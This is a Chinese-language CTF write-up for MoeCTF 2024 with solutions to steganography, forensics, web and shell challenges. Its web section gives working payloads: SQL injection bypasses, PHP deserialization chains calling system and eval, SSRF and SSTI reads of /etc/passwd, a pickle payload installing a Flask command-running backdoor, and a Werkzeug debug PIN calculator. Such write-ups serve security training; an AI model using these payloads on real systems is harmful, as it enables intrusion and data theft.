MoeCTF 2024

MISC

杂项入门指北

海报图片按这个角度解摩斯密码得到flag

ez_F5

F5隐写
密码在十六进制数据中,解base64得到

罗小黑战记

from PIL import Image
import os

def save_gif_frames(gif_path):
    # 打开 GIF 图片
    gif = Image.open(gif_path)
    
    # 创建输出目录
    output_dir = "xxx"
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    
    # 遍历每一帧并保存
    frame = 0
    while True:
        # 保存当前帧
        gif.save(os.path.join(output_dir, f"frame_{frame}.png"))
        
        frame += 1
        
        try:
            # 移动到下一帧
            gif.seek(frame)
        except EOFError:
            # 如果达到最后一帧，退出循环
            break
    
    print(f"Saved {frame} frames to {output_dir} directory.")

if __name__ == "__main__":
    gif_path = "xxx"  # 替换为你的 GIF 文件路径
    save_gif_frames(gif_path)

有两帧的二维码,扫描得到flag

readme

https://blog.csdn.net/cosmoslin/article/details/122660083?spm=1001.2014.3001.5506

fd 是一个目录，里面包含着当前进程打开的每一个文件的文件描述符（file descriptor），这些文件描述符是指向实际文件的一个符号链接，即每个通过这个进程打开的文件都会显示在这里。所以我们可以通过fd目录里的文件获得指定进程打开的每个文件的路径以及文件内容.
在 linux 系统中，如果一个程序用open()打开了一个文件但最终没有关闭他，即便从外部（如os.remove(SECRET_FILE)）删除这个文件之后，在 /proc 这个进程的 pid 目录下的 fd 文件描述符目录下还是会有这个文件的文件描述符，通过这个文件描述符我们即可得到被删除文件的内容。

源码处可以发现fd打开(open)了文件但是并没有关闭(close),这样的话该文件内容依然可以通过fd找到,即使后面执行了remove也不管用
/proc 目录保存着系统内存中的信息,/proc/self则可以直接转到当前进程下的目录,而fd目录下一般从3开始

所以我们查看/proc/self/fd/3后得到flag

其实靶机也就这一个进程,因此也可以/proc/1/fd/3

捂住一只耳

音频最后能听到一串数字
键盘坐标密码

moejail_lv1

__import__("os").system("sh")直接getshell,flag放在/tmp/.txxx里面,直接cat得到

moejail_lv2

同第一关解法

ctfer2077①

010打开搜索flag拿到hint:where is the flag? OK I give you some hints:incomplete LSB
zsteg拿到flag

每人至少300份

拿到加密的代码和散乱的二维码
拼好后扫出内容
balabalballablblablbalablbalballbase58lblblblblllblblblblbalblbdjshjshduieyrfdrpieuufghdjhgfjhdsgfsjhdgfhjdsghjgfdshjgfhjdgfhgdh///key{3FgQG9ZFteHzw7W42}??
把key的内容解密base58得到内容套上flag头提交即可

这个加密代码不知道出题者要干嘛(

#解密脚本
def decode_character(encoded_char):
    # 解密字符部分
    ascii_val = ord(encoded_char)
    if ascii_val >= 116:  # ASCII 码 >= 't'
        return chr(ascii_val - 19)
    elif ascii_val <= 97:  # ASCII 码 <= 'a'
        return chr(ascii_val + 19)
    elif 104 <= ascii_val <= 115:  # ASCII 码在 'h' 和 's' 之间
        return chr(219 - ascii_val)
    else:
        return encoded_char

def reverse_self_encoding(encoded_text):
    # 先反转编码后的文本
    reversed_text = encoded_text[::-1].strip()

    # 拆分反转后的文本
    encoded_list = reversed_text.split()
    
    decoded_text = ""
    number_setting = "0123456789"
    i = 0
    
    while i < len(encoded_list):
        char = encoded_list[i]
        
        if char.isalpha():
            decoded_char = decode_character(char)
            decoded_text += decoded_char
        elif char.isdigit():
            if i + 1 < len(encoded_list) and encoded_list[i + 1].isdigit():
                # 数字 XOR 解码
                decoded_digit = int(char) ^ int(encoded_list[i + 1])
                decoded_text += str(decoded_digit)
                i += 1  # 跳过下一个已经处理的数字
            else:
                decoded_text += char

        i += 1

    return decoded_text

# 测试逆向解密函数
if __name__ == "__main__":
    # 输入编码后的文本（已反转）
    encoded_text = "9 1 31 d l i w i r s a"  # 示例编码文本，实际值应与编码后的文本匹配
    decoded_text = reverse_self_encoding(encoded_text)
    print("Decoded Text: ", decoded_text)

the_secret_of_snowball

jpg文件头修复一下
FF D6 FF -> FF D8 FF 拿到前半flag
还有一半在最底部的base64解密得到

Find It

“今天天气真好啊，不愧是我大西安”，来西安旅游的npm感叹道，拍张照片吧。可惜，npm并没有想到，这张照片暴露的信息貌似太多了，你能根据这张照片找到npm拍摄照片时所在的小区嘛。
注：该小区有两个幼儿园，请取两个幼儿园共有的字，全拼小写，以_分离且以moectf{}包裹提交

调亮图片后得到信息雄峰, 描述得知在西安,定位后找方向

moectf{ji_di_bao_you_er_yuan}

解不完的压缩包

套娃压缩包

import zipfile
import re
import os

zipname = "xxx"
output_dir = "xxx"

while True:
    with zipfile.ZipFile(zipname) as ts1:
        first_file = ts1.namelist()[0]
        res = re.search(r'[0-9]+', first_file)
        if res:
            print(res.group())
        ts1.extractall(output_dir)
        zipname = os.path.join(output_dir, first_file)
        if first_file == "1.zip":
            break

最后文件名cccccccrc.zip里面四个pwd都是2字节大小,考虑crc爆破出内容后解密flag.txt出来

from binascii import crc32
import string
import zipfile
dic=string.printable
def CrackCrc(crc):
    for i in dic :
        # print (i)
        for j in dic:
                    s=i+j
                    # print (crc32(bytes(s,'ascii')) & 0xffffffff)
                    if crc == (crc32(bytes(s,'ascii')) & 0xffffffff):
                        print (s)
                        return
 
def getcrc32(fname):
    l=[]
    file = fname
    f = zipfile.ZipFile(file, 'r')
    global fileList
    fileList =f.namelist ()
    print (fileList)
    # print (type(fileList))
    for filename in fileList:
        Fileinfo = f.getinfo(filename)
        # print(Fileinfo)
        crc = Fileinfo.CRC
        # print ('crc',crc)
        l.append(crc)
    return l
 
def main (filename=None):
    l = getcrc32(filename)
    # print(l)
    for i in range(len(l)):
        print(fileList[i], end='的内容是:')
        CrackCrc(l[i])
 
if __name__  == "__main__":
    main ('xxx')

The upside and down

文件十六进制数据是逆向过来的png数据,脚本逆回去得到二维码扫后得到flag

def reverse_hex_and_save_to_file(hex_string, file_name):
    # 去除空格和换行符
    hex_string = hex_string.replace(' ', '').replace('\n', '')
    
    # 反转整个十六进制字符串
    reversed_hex_string = hex_string[::-1]
    
    # 将反转后的十六进制字符串转换为字节
    byte_data = bytes.fromhex(reversed_hex_string)
    
    # 将字节数据写入文件
    with open(file_name, 'wb') as file:
        file.write(byte_data)

# 输入的十六进制文本
input_hex = '''
xxx
'''  # 替换为你的十六进制数据
# 输出文件名
output_file = "xxx"
# 反向处理并保存到文件
reverse_hex_and_save_to_file(input_hex, output_file)

ez_Forensics

某天，ubw亲眼看着npm在cmd中输入命令，将flag写入了flag.txt，然后删除了flag.txt。npm自信地认为没有人能够获取这道题的flag。然而，npm并没有料到，在他关闭cmd前，ubw及时保存了电脑的内存镜像。

内存取证使用volatility,命令参考:https://blog.csdn.net/m0_68012373/article/details/127419463
根据题目描述查看终端执行过的命令,cmdscan找到flag
`$ python2 vol.py -f /c/Users/Nanian233/Desktop/flag.raw --profile=Win7SP1x64 cmdscan``

ctfer2077②

为了拯救T-bug和杰克，你不得不和某个联觉信标被更改的系统达成合作，它帮你改写剧情，而你帮它拿到一个关键的key。“key在这个加密卷里，我只知道密码是’法治富强自由富强和谐平等和谐平等法治法治和谐富强法治文明公正自由’，他宝贝的，只能靠你自己解密了。” 请将得到的flag以moectf{}包裹提交

价值观解密得到密码p@55w0rd
附件给了一个加密卷,拿上述密码到VeraCrypt挂载后查看该磁盘只有一个假flag文件
使用DiskGenius恢复磁盘文件后得到一个小鹤.txt,里面是一个密文
搜索小鹤得知是一个双拼输入法品牌,那就用双拼来输入密文的内容得到flag

我的图层在你之上

https://www.autotracer.org/zh.html
转svg后打开源码,删去第二层再打开就可以去掉覆盖的黑色图层,得到内容:key=p_w_d

解压后得到加密字符串,根据附件名caesar得知为凯撒加密,爆破后得到偏移量为13,解密得到flag

时光穿梭机

大量的铯废料堆积，能量放射过高，划出时间裂缝，sparkle穿越到1946年4月20日的伦敦，一脸茫然的她捡到一张当地知名的画报，上面写着国内的消息，知名古墓被开！？正当疑惑时，一眨眼又穿梭到2024年8月23日的该古墓遗址公园，反复的时空穿梭令她心口绞痛，从公园正门夺门而出，来到正对的中医院，大夫热心地治好了心痛之疾，眨眼间又穿梭到家，打开电脑，记录下这段神奇的经历！
flag内容为中医院前三个汉字的小写拼音，整个汉字拼音之间以_连接，flag内容以moectf{}包裹

在网上把《遗失在西方的中国史 :《伦敦新闻画报》记录的民国1926～1949》pdf下载下来
定位到1946年4月20日,这个翻译有问题,百度识图得到永陵王建墓再用百度地图找到正门的对面

so many ‘m’

杂乱字符串,字频统计得到flag

WEB

Web渗透测试与审计入门指北

本地搭一下网页打开得到flag

垫刀之路01: MoeCTF？启动！

直接就getshell了,flag在环境变量,env查看即可

垫刀之路02: 普通的文件上传

没有任何防护,直接传.php一句话木马上去,flag依然在环境变量

垫刀之路03: 这是一个图床

只检查MIME类型,先传png然后bp中途抓包修改后缀为php即可,还是环境变量存flag

垫刀之路04: 一个文件浏览器

路径穿越
payload:?path=…/…/…/…//tmp/flag

垫刀之路05: 登陆网站

万能密码,闭合符为单引号
payload:username=admin123&password=1' or 1=1 #

垫刀之路06: pop base mini moe

源码:

<?php

class A {
    // 注意 private 属性的序列化哦
    private $evil;

    // 如何赋值呢
    private $a;

    function __destruct() {
        $s = $this->a;
        $s($this->evil);
    }
}

class B {
    private $b;

    function __invoke($c) {
        $s = $this->b;
        $s($c);
    }
}


 if(isset($_GET['data']))
 {
     $a = unserialize($_GET['data']);
 }
 else {
     highlight_file(__FILE__);
 }

函数调用顺序:__destruct() -> __invoke()
EXP:

<?php
class A {
    public $evil;
    public $a;
}

class B {
    public $b;
}
$A = new A();
$B = new B();

$A->a    =$B;
$A->evil ="tac /f*";
$B->b    ="system";

echo serialize($A);

payload:?data=O:1:"A":2:{s:4:"evil";s:7:"tac /f*";s:1:"a";O:1:"B":1:{s:1:"b";s:6:"system";}}

垫刀之路07: 泄漏的密码

/console 输入pin码进入debug
os.popen('cat /app/flag').read()拿到flag

pop moe

常规反序列化
题目:

<?php

class class000 {
    private $payl0ad = 0;
    protected $what;

    public function __destruct()
    {
        $this->check();
    }

    public function check()
    {
        if($this->payl0ad === 0)
        {
            die('FAILED TO ATTACK');
        }
        $a = $this->what;
        $a();
    }
}

class class001 {
    public $payl0ad;
    public $a;
    public function __invoke()
    {
        $this->a->payload = $this->payl0ad;
    }
}

class class002 {
    private $sec;
    public function __set($a, $b)
    {
        $this->$b($this->sec);
    }

    public function dangerous($whaattt)
    {
        $whaattt->evvval($this->sec);
    }

}

class class003 {
    public $mystr;
    public function evvval($str)
    {
        eval($str);
    }

    public function __tostring()
    {
        return $this->mystr;
    }
}

if(isset($_GET['data']))
{
    $a = unserialize($_GET['data']);
}
else {
    highlight_file(__FILE__);
}

函数调用顺序:
__destruct()->check()->__invoke()->__set()->dangerous()->evvval()->eval()
Exp:

<?php

class class000 {
    public $payl0ad;
    public $what;
}

class class001 {
    public $payl0ad;
    public $a;
}

class class002 {
    public $sec;
}

class class003 {
    public $mystr;
}

$class000 = new class000();
$class001 = new class001();
$class002 = new class002();
$class003 = new class003();

$class000->payl0ad = 1;
$class000->what = $class001;

$class001->payl0ad = 'dangerous'; 
$class001->a = $class002;

$class002->sec = $class003;
$class003->mystr = "system('echo \$FLAG');";

echo serialize($class000);

?>

payload:
?data=O:8:"class000":2:{s:7:"payl0ad";i:1;s:4:"what";O:8:"class001":2:{s:7:"payl0ad";s:9:"dangerous";s:1:"a";O:8:"class002":1:{s:3:"sec";O:8:"class003":1:{s:5:"mystr";s:21:"system('echo $FLAG');";}}}}

ProveYourLove &七夕限定

要求提交300份告白,先随便告白一次抓个包,用intruder实现批量

回到页面得到flag

ez_http

GET   xt=大帅b
POST imoau=sb
User-Agent: MoeDedicatedBrowser
Referer: https://www.xidian.edu.cn/
Cookie: user=admin
x-forwarded-for: 127.0.0.1

弗拉格之地的入口

/robots.txt拿到信息

访问/webtutorEntry.php拿到flag

弗拉格之地的挑战

web人也有自己的九转大肠?(

第一层:源代码处拿到flag1和下一个路由
第二层:在http请求头拿到flag2和下一个路由
第三层:按照要求get post 并将cookie内verify参数的内容user修改为admin拿到flag3和下一个路由
第四层:按要求添加Referer头进行来源伪造后查询源码发现需要post 'method=get’拿到flag4和路由
第五层:前端校验所输入的内容,查询源码后使用POST 'content= I want flag’拿到flag5和路由
第六层:代码如下,payload:?moe=flAg,POST:moe=1拿到flag6和路由

<?php
highlight_file("flag6diw.php");
if (isset($_GET['moe']) && $_POST['moe']) {
    if (preg_match('/flag/', $_GET['moe'])) {
        die("no");
    } elseif (preg_match('/flag/i', $_GET['moe'])) {
        echo "flag6: xxx";
    }
}

第七层:eval($_POST[‘what’]); 直接命令执行payload: POST:what=system('tac /flag7');
最后合在一起解码base64得到flag

静态网页

互动看板娘得知换装功能会请求后端(第三个按钮)

抓包后拿到路由/api/get/?id=1-23
https://github.com/fghrsh/live2d_api查下用法

改成/api/get/?id=1-23路由得到hint

“flag”: “Please turn to final1l1l_challenge.php”

#题目
<?php
highlight_file('final1l1l_challenge.php');
error_reporting(0);
include 'flag.php';

$a = $_GET['a'];
$b = $_POST['b'];
if (isset($a) && isset($b)) {
    if (!is_numeric($a) && !is_numeric($b)) {
        if ($a == 0 && md5($a) == $b[$a]) {
            echo $flag;
        } else {
            die('noooooooooooo');
        }
    } else {
        die( 'Notice the param type!');
    }
} else {
    die( 'Where is your param?');
}

#测试用例
<?php
$a = "s878926199a";
$b = "0a";

if (!is_numeric($a) && !is_numeric($b)){
        echo "yes1\n";
}
echo         md5($a)."\n";
echo    $b[$a]."\n";
                
if ($a == 0 && md5($a) == $b[$a]){
        echo "yes2";        
}

Payload:
?a=s878926199a(md5加密后是0e开头从而弱等于0)
b=0a

电院_Backend

robots.txt提示/admin路由
审计附件login.php

$email = $_POST['email'];
if(!preg_match("/[a-zA-Z0-9]+@[a-zA-Z0-9]+\\.[a-zA-Z0-9]+/", $email)||preg_match("/or/i", $email)){
    echo json_encode(array('status' => 0,'info' => '不存在邮箱为： '.$email.' 的管理员账号！'));
    unset($_SESSION['captcha_code']);
    exit;
}

$pwd = $_POST['pwd'];
$pwd = md5($pwd);

$sql = "SELECT * FROM admin WHERE email='$email' AND pwd='$pwd'";

总共两个注入点,但pwd被md5加密了所以不能用,那就看$email
闭合符为单引号,过滤了 or 用||绕过
123@qq.com' || 1=1 #万能密码登录成功得到flag

勇闯铜人阵

脚本题

import requests
from bs4 import BeautifulSoup
import time
import re

def get_dir(num):
    dirs = {
        '1': '北方', '2': '东北方', '3': '东方', '4': '东南方',
        '5': '南方', '6': '西南方', '7': '西方', '8': '西北方'
    }
    return dirs.get(num, '未知')

def parse_dirs(dirs_str):
    parts = dirs_str.split(',')
    counts = {}
    for part in parts:
        dir = get_dir(part.strip())
        counts[dir] = counts.get(dir, 0) + 1
    return '，'.join(f"{dir}{'一个' if count == 1 else f'{count}个'}" for dir, count in counts.items())

def play():
    sess = requests.Session()
    url = 'xxx'
    
    resp = sess.post(url, data={'player': '张三', 'direct': '弟子明白'})
    
    while True:
        soup = BeautifulSoup(resp.text, 'html.parser')
        status = soup.find(id='status').text.strip()
        
        if "你过关" in status:
            print("游戏结束")
            match = re.search(r'moectf{[^}]+}', resp.text)
            if match:
                print(match.group())
            break
        
        dir_text = parse_dirs(status) if ',' in status else get_dir(status)
        
        print(f"接收到的数字: {status}, 对应方向: {dir_text}")
        
        resp = sess.post(url, data={'player': '张三', 'direct': dir_text})
        
        time.sleep(1)

if __name__ == '__main__':
    play()

Re: 从零开始的 XDU 教书生活

你成为了 XDU 的一个教师，现在你的任务是让所有学生签上到（需要从学生账号签上到，而不是通过教师代签）。注意：

本题约定：所有账号的用户名 == 手机号 == 密码。教师账号用户名：10000。

当开启签到页面时，二维码每 10 秒刷新一次，使用过期的二维码无法完成签到。（浏览器不开启签到页面时，不会进行自动刷新，可以持续使用有效的二维码，除非手动发送获取二维码的请求）当你完成任务后，请结束签到活动。你将会获得 Flag 。

更麻烦一点的脚本题
探索后发现二维码签到原理是拿每个学生的登录信息去请求一个签到url
因此我先上老师号拿个二维码,然后退出(保证二维码不刷新),然后随便上个学生号扫码后拿到签到url
把这个签到url放脚本里面,再放上靶机url

import requests

BASE_URL = "xxx"
TEACHER_PHONE = "10000"
PASSWORD = "10000"
QR_CODE_PARAMS = {
    "id": "xxx",
    "c": "xxx",
    "enc": "xxx",
    "DB_STRATEGY": "PRIMARY_KEY",
    "STRATEGY_PARA": "id"
}

session = requests.Session()

def login_as_teacher():
    response = session.post(f"{BASE_URL}/fanyalogin", data={
        "uname": TEACHER_PHONE,
        "password": PASSWORD
    })
    if response.json().get('status'):
        print("Logged in as teacher successfully.")
    else:
        raise Exception("Failed to log in as teacher.")

def get_student_accounts():
    response = session.get(f"{BASE_URL}/widget/sign/pcTeaSignController/showSignInfo1")
    return [student["uid"] for student in response.json().get("data", {}).get("changeUnSignList", [])]

def login_as_student(phone):
    response = session.post(f"{BASE_URL}/fanyalogin", data={
        "uname": str(phone),
        "password": str(phone)
    })
    return response.json().get('status')

def scan_qr_code():
    response = session.get(f"{BASE_URL}/widget/sign/e", params=QR_CODE_PARAMS)
    return response.text

def main():
    login_as_teacher()
    student_phones = get_student_accounts()

    success_count = 0
    for index, phone in enumerate(student_phones, start=1):
        print(f"Logging in as student {phone} (#{index})...")
        if login_as_student(phone):
            print(f"Student {phone} logged in successfully.")
            result = scan_qr_code()
            print(f"Scan result for student {phone}: {result}")
            if "签到成功" in result:
                success_count += 1
            session.cookies.clear()

    print(f"All students processed. Total successful sign-ins: {success_count}.")
    if success_count == len(student_phones):
        print("All students have signed in successfully.")

if __name__ == "__main__":
    main()
#....Scan result for student 9502528: 签到成功
#All students processed. Total successful sign-ins: 1023.
#All students have signed in successfully.

全部签到后重登教师账号结束签到即可拿到flag

ImageCloud前置

url后面怎么有个?url=, 啧啧啧，这貌似是一个很经典的漏洞, flag在/etc/passwd里，嗯？这是一个什么文件声明：题目环境出不了网，无法访问http资源，但这并不影响做题，您可以拿着源码本地测试

ssrf,用file直接读即可
payload:?url=file:////etc/passwd

ImageCloud

一打开让文件上传,先随便传一个,自动跳转图片页面:
http://靶机地址/image?url=http://localhost:5000/static/0_test.gif
附件得知flag.jpg在/uploads目录下,并且还有源码

#app.py
@app.route('/image', methods=['GET'])
def load_image():
    url = request.args.get('url')
    if not url:
        return 'URL 参数缺失', 400

    try:
        response = requests.get(url)
        response.raise_for_status()
        img = Image.open(BytesIO(response.content))

        img_io = BytesIO()
        img.save(img_io, img.format)
        img_io.seek(0)
        return send_file(img_io, mimetype=img.get_format_mimetype())
    except Exception as e:
        return f"无法加载图片: {str(e)}", 400

if __name__ == '__main__':
    if not os.path.exists(UPLOAD_FOLDER):
        os.makedirs(UPLOAD_FOLDER)
    app.run(host='0.0.0.0', port=5000)
   
#app2.py   
    @app.route('/image/<filename>', methods=['GET'])
def load_image(filename):
    filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
    if os.path.exists(filepath):
        mime = get_mimetype(filepath)
        return send_file(filepath, mimetype=mime)
    else:
        return '文件未找到', 404

if __name__ == '__main__':
    if not os.path.exists(UPLOAD_FOLDER):
        os.makedirs(UPLOAD_FOLDER)
    port = find_free_port_in_range(5001, 6000)
    app.run(host='0.0.0.0', port=port)

审计后发现而上传的图片存在/static里,访问时以?url=本地ip/目录名/文件名来访问的,有ssrf内味.static那个py文件是运行在5000端口的,而uploads是运行在5001-6000任意端口的,访问图片时以/image/文件名来访问, 因此我们只需要利用这个url参数访问内网的/uploads/flag.jpg即可.使用BP爆破端口,然后访问flag.jpg拿到flag
payload:/image?url=http://localhost:5938/image/flag.jpg

PetStore

pickle反序列化,无过滤,但测试时一直没回显(可能操作不对吧),于是决定传内存马

import pickle
import base64
class test():
    def __reduce__(self):
        return (eval,("__import__(\"sys\").modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None, []).append(lambda :__import__('os').popen(request.args.get('cmd')).read())",))

a = test()
b = pickle.dumps(a)
print(base64.b64encode(b))

传值后直接命令执行即可
payload:?cmd=env

who’s blog?

参考:https://blog.csdn.net/weixin_45751765/article/details/124099832
扫到路由/console,估计是垫刀之路07过来的,本题需要计算pin码
pin码计算需要以下信息:
username 启动flask的用户名 (/etc/passwd)
modname 默认值为flask.app
appname 默认为Flask
moddir 看报错信息可以得到app.py的绝对路径
uuidnode (/sys/class/net/ens33/address) 去掉冒号后int(“c2f233c6de75”,16)转换为十进制
machine-id 基于不同版本有不同的算法

在werkzeug 1.0.0rc1之前为:
docker环境: /proc/self/cgroup里面…/docker/后面的内容
非docker: /etc/machine-id或/proc/sys/kernel/random/boot_id的内容

在werkzeug 1.0.0rc1及之后为:
/etc/machine-id或/proc/sys/kernel/random/boot_id
+
/proc/self/cgroup
生成pin码也有md5和sha1算法两种

#MD5
import hashlib
from itertools import chain
probably_public_bits = [
     'flaskweb'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
     '25214234362297',# str(uuid.getnode()),  /sys/class/net/ens33/address
     '0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
   h.update(b'pinsalt')
   num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
   for group_size in 5, 4, 3:
       if len(num) % group_size == 0:
          rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
          break
       else:
          rv = num

print(rv)

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'root'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '2485377581187',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个)：1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '653dc458-4634-42b1-9a7a-b22a082e1fce55d22089f5fa429839d25dcea4675fb930c111da3bb774a6ab7349428589aefd'#  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

网页提示传参id,测试后发现有ssti注入
?id={% for c in [].__class__.__mro__[-1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read()}}{% endif %}{% endfor %}
查询用户列表,发现只有root具有shell权限,因此确定用户为root,同上payload修改文件路径得到其他数据
本题的机器id为/proc/sys/kernel/random/boot_id的内容,算法为sha1,使用上述脚本得到pin码后成功进入debug

1 2	>>>import os >>> os.popen('env').read()

smbms

检查sql文件源码得知登录密码是弱口令,随便找个密码字典爆破得到密码1234567
登录后在用户管理界面感觉存在sql注入,常规测试后直接上sqlmap
扫出盲注payload/jsp/user.do?method=query&queryName=1' AND (SELECT 1546 FROM (SELECT(SLEEP(5)))oXcZ) AND 'ZdgB'='ZdgB&queryUserRole=0&pageIndex=1

开发运维

哦不！我的libc！

西安电子科技大学的一些课题组使用的古老服务器有些来源于超算中心，有些则在祖传了很久的老旧机房里，想联系到硬件管理员难如登天，联系到了他也不一定找得到钥匙。然后大伙就都用着一根网线连接着一台不知道跑了多久的 linux 机器凑合用。直到有一天，有一个哥们手滑给 glibc 卸载了。
glibc 是什么东西呢？几乎所有的现代 GNU/Linux 程序都链接在上面（musl程序毕竟是少数）。这下好了，连基础的 ls、cp、mv 都没法用了。于是这哥们开始寻找补救措施，有好几个学长的毕业论文数据还在上面呢，这要是丢了那学长们就可以和他同一年毕业了。但是怎么补救啊？手头啥也没有，于是问了一圈人，给 Reverier 冤大头找来了。现在整个服务器只有一个 shell 还活着，没有 glibc 连新的 ssh 连接都无法建立。
flag在/flag.txt

非预期:
内建命令有read可以搭配重定向读文件:while IFS= read -r line; do echo “$line”; done < /flag.txt
正常做法参考:
https://www.cnblogs.com/mikeguan/p/7476821.html